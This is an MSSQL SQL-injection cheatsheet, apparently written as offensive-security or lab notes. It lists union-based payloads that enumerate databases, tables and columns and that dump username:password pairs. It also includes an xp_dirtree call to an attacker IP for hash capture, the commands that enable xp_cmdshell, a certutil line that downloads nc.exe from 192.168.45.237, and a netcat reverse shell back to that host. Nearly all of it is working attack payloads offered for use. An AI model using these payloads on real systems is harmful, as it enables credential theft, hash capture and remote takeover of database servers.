MSSQL Cheatsheet
Database names and IDs
user
db_name(5)
union select name,id from <db>..sysobjects where xtype='u'-- -
union select concat(name,':',id) from <db>..sysobjects where xtype='u'-- -
union select 1,(select string_agg(concat(name,':',id), '|') from <db>..sysobjects where xtype='u')-- -
-- Server fingerprint: returns the full version banner (build number, edition, host OS).
Select @@version;
-- Lists every database on the instance; needs only VIEW ANY DATABASE, which SQL Server grants to public by default,
-- so an ordinary application login can usually run this.
Select name from sys.databases;
-- Table inventory of master via the ANSI information_schema views (only objects the login has some permission on are shown).
select * from master.information_schema.tables;
-- NOTE(review): master has no `users` table by default; the legacy compatibility view is `master..sysusers` — confirm against the instance.
select * from master..users;
Databases with IDs 1-4 are the default MSSQL databases; also note down the database ID, since the table and column queries need it.
Enumerate columns
union select (select string_agg(name, '|') from <db>..syscolumns where id='<dbID>')
Dump columns
union select 1,(select string_agg(concat(username,':',password), '|') from <table>)-- -
%s/[ ]//g
%s/|/\r/g
cat cracked | awk -F: '{print $1":"$3}'
cat cracked | awk -F: '{print $1}'
Query stacking with ;
q=fast'; exec xp_dirtree '\\10.10.14.6\adot8';-- -
RCE
-- Enabling xp_cmdshell is a two-step, server-wide configuration change: 'show advanced options' must be on first,
-- and each sp_configure call only takes effect after the following RECONFIGURE.
-- Both calls need the ALTER SETTINGS server permission (held by sysadmin/serveradmin), and each successful change is
-- written to the SQL Server error log ("Configuration option 'xp_cmdshell' changed from 0 to 1"), which is the
-- primary detection point; the current state can be checked at any time with EXEC sp_configure 'xp_cmdshell'.
sp_configure 'show advanced options', '1'
RECONFIGURE
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
'EXEC sp_configure 'show advanced options',1-- -
'RECONFIGURE-- -
'EXEC sp_configure 'xp_cmdshell',1-- -
'RECONFIGURE-- -
'EXEC xp_dirtree "\\192.168.45.237\adot8"-- -
'EXEC xp_cmdshell 'certutil.exe -f -urlcache "http://192.168.45.237/nc.exe" C:\programdata\nc.exe'-- -
'EXEC xp_cmdshell 'powershell.exe -c "C:\Programdata\nc.exe -e powershell.exe 192.168.45.237 1337"'-- -